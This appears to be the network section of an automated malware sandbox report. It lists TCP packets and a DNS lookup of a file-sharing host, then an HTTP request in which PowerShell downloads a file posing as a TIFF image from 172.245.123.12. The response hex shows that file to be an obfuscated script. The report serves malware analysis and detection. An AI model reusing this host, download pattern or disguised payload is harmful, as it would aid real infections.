                                                            Dec 2, 2024 09:18:34.453342915 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.453418970 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.455753088 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.506335020 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.558021069 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.558109045 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.558201075 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.559024096 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.559149027 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.559201956 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.561170101 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.561289072 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.561343908 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.563040972 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.563144922 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.563196898 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.565045118 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.565167904 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.565215111 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.566993952 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.567156076 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.567202091 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.568974018 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.569092989 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.569152117 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.570918083 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.571077108 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.571121931 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.572617054 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.572760105 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.572808981 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.574304104 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.574399948 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.574460030 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.575969934 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.576055050 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.576112032 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.577671051 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.577733040 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.577794075 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.579292059 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.579410076 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.579477072 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.580926895 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.581037045 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.581098080 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.582524061 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.582659960 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.582731962 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.584172964 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.584394932 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.584518909 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.585839033 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.586025000 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.586097002 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.587474108 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.587577105 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.587649107 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.589092016 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.589209080 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.589284897 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.590735912 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.590925932 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.591007948 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.592391968 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.592494965 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.592573881 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.594033003 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.594152927 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.594234943 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.595681906 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.595885038 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.595931053 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.597296953 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.597394943 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.597440958 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.598941088 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.599046946 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.599087954 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.600591898 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.600701094 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.600745916 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.602216959 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.602329969 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.602380037 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.603950977 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.604028940 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.604074001 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.605485916 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.605678082 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.605721951 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.607161045 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.607239008 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.607276917 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.608783007 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.608901024 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.608941078 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.610423088 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.610528946 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.610572100 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.612530947 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.612541914 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.612585068 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.613694906 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.613820076 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.613862038 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.615353107 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.615472078 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.615525961 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.617006063 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.617132902 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.617180109 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.618674040 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.618745089 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.618793011 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.620274067 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.620394945 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.620446920 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.621903896 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.622023106 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.622066975 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.623594999 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.623660088 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.623703003 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.625194073 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.625288963 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.625345945 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.626842976 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.626909018 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.626955986 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.628463984 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.628568888 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.628618002 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.630110979 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.630228043 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.630273104 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.631783009 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.631879091 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.631916046 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.633404970 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.633555889 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.633590937 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.635030031 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.635132074 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.635194063 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.636687994 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.636814117 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.636910915 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.640764952 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.640777111 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.640826941 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.640917063 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.641067028 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.641105890 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.642695904 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.642707109 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.642754078 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.644321918 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.644469023 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.644511938 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.645916939 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.646080017 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.646119118 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.759414911 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.759506941 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.759630919 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.760049105 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.760164976 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.760245085 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.761163950 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.761234999 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.761311054 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.762392998 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.762432098 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.762505054 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.763714075 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.763823986 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.763899088 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.764998913 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.765101910 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.765175104 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.766297102 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.766417027 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.766488075 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.767594099 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.767680883 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.767750978 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.768829107 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.768964052 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.769036055 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.770101070 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.770230055 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.770299911 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.771322012 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.771439075 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.771502018 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.772598982 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.772715092 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.772804022 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.773829937 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.773952007 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.774028063 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.775106907 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.775172949 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.775245905 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.776333094 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.776443005 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.776513100 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.777566910 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.777669907 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.777743101 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.778821945 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.778927088 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.778996944 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.780062914 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.780203104 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.780273914 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.781348944 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.781469107 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.781541109 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.782567024 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.782669067 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.782761097 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.783807039 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.783931017 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.784007072 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.785126925 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.785161018 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.785243034 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.786302090 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.786418915 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.786490917 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.787552118 CET8049739172.245.123.12192.168.2.4
                                                            Dec 2, 2024 09:18:34.834402084 CET4973980192.168.2.4172.245.123.12
                                                            Dec 2, 2024 09:18:34.842293978 CET4973980192.168.2.4172.245.123.12

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 2, 2024 09:18:11.678822041 CET5074653192.168.2.41.1.1.1
                                                            Dec 2, 2024 09:18:12.002547026 CET53507461.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 2, 2024 09:18:11.678822041 CET192.168.2.41.1.1.10x2b1dStandard query (0)1016.filemail.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 2, 2024 09:18:12.002547026 CET1.1.1.1192.168.2.40x2b1dNo error (0)1016.filemail.comip.1016.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 2, 2024 09:18:12.002547026 CET1.1.1.1192.168.2.40x2b1dNo error (0)ip.1016.filemail.com142.215.209.77A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • 1016.filemail.com
                                                            • 172.245.123.12

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449732172.245.123.12803300C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 2, 2024 09:18:05.413888931 CET324OUTGET /361/seemebestthingsentirelifegivenbackwithgood.tIF HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                            Host: 172.245.123.12
                                                            Connection: Keep-Alive
                                                            Dec 2, 2024 09:18:06.576272964 CET1236INHTTP/1.1 200 OK
                                                            Date: Mon, 02 Dec 2024 16:18:06 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                            Last-Modified: Mon, 02 Dec 2024 02:06:06 GMT
                                                            ETag: "2597c-6283ffdcaf502"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 153980
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: image/tiff
                                                            Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 64 00 57 00 49 00 4c 00 57 00 4c 00 6f 00 57 00 52 00 75 00 41 00 4c 00 43 00 78 00 42 00 20 00 3d 00 20 00 22 00 7a 00 6c 00 6d 00 6b 00 66 00 62 00 57 00 6d 00 67 00 75 00 70 00 57 00 68 00 4e 00 47 00 22 00 0d 00 0a 00 72 00 6f 00 54 00 69 00 6b 00 6c 00 5a 00 64 00 4c 00 57 00 42 00 74 00 47 00 4b 00 51 00 20 00 3d 00 20 00 22 00 61 00 4c 00 6c 00 65 00 61 00 4b 00 6b 00 4b 00 48 00 63 00 4c 00 5a 00 63 00 63 00 4c 00 22 00 0d 00 0a 00 66 00 50 00 70 00 78 00 6a 00 61 00 4e 00 71 00 52 00 48 00 4b 00 4f 00 74 00 43 00 63 00 20 00 3d 00 20 00 22 00 43 00 6d 00 67 00 57 00 66 00 50 00 6b 00 57 00 52 00 74 00 78 00 67 00 71 00 69 00 73 00 22 00 0d 00 0a 00 0d 00 0a 00 6f 00 63 00 69 00 4c 00 4e 00 55 00 47 00 7a 00 65 00 67 00 4b 00 68 00 4a 00 50 00 4c 00 20 00 3d 00 20 00 22 00 47 00 6b 00 48 00 68 00 6c 00 42 00 4b 00 72 00 49 00 63 00 61 00 69 00 62 00 57 00 66 00 22 00 0d 00 0a 00 75 00 57 00 69 00 57 00 53 00 4c 00 66 00 6e 00 6c 00 6b 00 [TRUNCATED]
                                                            Data Ascii: dWILWLoWRuALCxB = "zlmkfbWmgupWhNG"roTiklZdLWBtGKQ = "aLleaKkKHcLZccL"fPpxjaNqRHKOtCc = "CmgWfPkWRtxgqis"ociLNUGzegKhJPL = "GkHhlBKrIcaibWf"uWiWSLfnlkaiZNO = "obIbKJLoLoiNWoi"LBoWfKmWPhcTicf = "GhLKUiuLbndvakU"dAiARRNLQLkAmqW = "vzbepUIvcACbWLt"NaclRNfuHGxdkUT = "jqWGAGLrzlcajPb"RbdjKcpLzufqIaU = "hPUOePLhoPhUhnK"TeKaNWSeadfLqNi = "nevBdmxWOhPLUBB"xmWPAuPfzaajsUi = "pAZWhoCLLCLbeIW"KvUClfeHZOsWinL = "zUBoSLGiGklWikK"fxlzxL
                                                            Dec 2, 2024 09:18:06.576297998 CET1236INData Raw: 00 6b 00 57 00 47 00 52 00 47 00 57 00 70 00 6b 00 43 00 20 00 3d 00 20 00 22 00 4b 00 63 00 4b 00 6c 00 75 00 6e 00 57 00 57 00 4c 00 49 00 47 00 6c 00 71 00 51 00 42 00 22 00 0d 00 0a 00 6c 00 78 00 49 00 48 00 6f 00 5a 00 6d 00 61 00 4c 00 6f
                                                            Data Ascii: kWGRGWpkC = "KcKlunWWLIGlqQB"lxIHoZmaLoWPzLK = "phACjoeCtWWZboG"LltJLGGPtLbGKiA = "LnNLWbhZcSlxmGu"GPLkOACBLlNbeC
                                                            Dec 2, 2024 09:18:06.576309919 CET1236INData Raw: 00 4f 00 66 00 75 00 55 00 61 00 47 00 22 00 0d 00 0a 00 49 00 66 00 70 00 57 00 75 00 74 00 4c 00 67 00 57 00 6d 00 63 00 6d 00 69 00 55 00 64 00 20 00 3d 00 20 00 22 00 4e 00 55 00 6b 00 7a 00 55 00 55 00 57 00 6d 00 42 00 62 00 5a 00 4a 00 4f
                                                            Data Ascii: OfuUaG"IfpWutLgWmcmiUd = "NUkzUUWmBbZJOGl"RliLlNWPkoWBWAP = "xinhcrsLBinNmiG"zaegGWjhAfLLjAn = "BzcoAoNWWBPkWNT"B
                                                            Dec 2, 2024 09:18:06.576507092 CET1236INData Raw: 00 4b 00 5a 00 20 00 3d 00 20 00 22 00 6e 00 50 00 52 00 69 00 68 00 71 00 4f 00 55 00 5a 00 43 00 4e 00 53 00 4f 00 6d 00 70 00 22 00 0d 00 0a 00 63 00 6d 00 69 00 49 00 52 00 42 00 70 00 51 00 5a 00 4b 00 72 00 63 00 6b 00 48 00 74 00 20 00 3d
                                                            Data Ascii: KZ = "nPRihqOUZCNSOmp"cmiIRBpQZKrckHt = "GxKuhuHiGfcUAlu"LShURZcmaLAJWqi = "tOLtoLzmRULUszN"KfKKkKUkcBkiAHU = "zcAA
                                                            Dec 2, 2024 09:18:06.576533079 CET1236INData Raw: 00 4c 00 78 00 66 00 47 00 5a 00 64 00 53 00 4b 00 6b 00 5a 00 49 00 4e 00 64 00 7a 00 43 00 20 00 3d 00 20 00 22 00 57 00 5a 00 4c 00 75 00 71 00 55 00 73 00 57 00 64 00 65 00 57 00 54 00 75 00 70 00 74 00 22 00 0d 00 0a 00 57 00 57 00 50 00 68
                                                            Data Ascii: LxfGZdSKkZINdzC = "WZLuqUsWdeWTupt"WWPhhiPUsrbKLWW = "GWkPcLlzdiRLBkf"PtHfONhdicLcWcU = "qkbrtKcceAixuKO"mWAOkpuk
                                                            Dec 2, 2024 09:18:06.576545954 CET1236INData Raw: 00 70 00 4c 00 61 00 70 00 63 00 65 00 6c 00 4f 00 6b 00 57 00 74 00 72 00 22 00 0d 00 0a 00 47 00 41 00 50 00 4c 00 41 00 4c 00 50 00 57 00 69 00 54 00 63 00 66 00 6e 00 57 00 41 00 20 00 3d 00 20 00 22 00 4c 00 65 00 6d 00 74 00 4c 00 66 00 6d
                                                            Data Ascii: pLapcelOkWtr"GAPLALPWiTcfnWA = "LemtLfmiBZzNdBA"UcLPGWKkLcLLiOL = "iiUKkQnZqGZAKKU"kLcfLUcvuoCnHGB = "pcolLNcKltIfW
                                                            Dec 2, 2024 09:18:06.576575041 CET1236INData Raw: 00 65 00 43 00 71 00 55 00 57 00 63 00 74 00 71 00 20 00 3d 00 20 00 22 00 52 00 6f 00 69 00 43 00 57 00 5a 00 42 00 63 00 4e 00 6e 00 4f 00 69 00 4c 00 6b 00 51 00 22 00 0d 00 0a 00 4b 00 63 00 57 00 74 00 55 00 61 00 50 00 62 00 68 00 65 00 65
                                                            Data Ascii: eCqUWctq = "RoiCWZBcNnOiLkQ"KcWtUaPbheemLWm = "icIKecgKBAWebGg"OvLUWkLkmqAkNcv = "WsIgbUtcpexBcSi"dfZKcGqetWUeJlv =
                                                            Dec 2, 2024 09:18:06.576855898 CET1236INData Raw: 00 6d 00 4b 00 41 00 22 00 0d 00 0a 00 6d 00 65 00 65 00 72 00 52 00 4b 00 41 00 4b 00 6d 00 68 00 61 00 66 00 63 00 6c 00 6e 00 20 00 3d 00 20 00 22 00 50 00 47 00 4b 00 4c 00 57 00 4b 00 78 00 6a 00 70 00 76 00 69 00 66 00 47 00 6b 00 6b 00 22
                                                            Data Ascii: mKA"meerRKAKmhafcln = "PGKLWKxjpvifGkk"IboqnpdbNRiAnLR = "kzxkiLNzprLoBiP"KKeLmSUitGGhhAW = "WGAZemiRaBllkUW"op
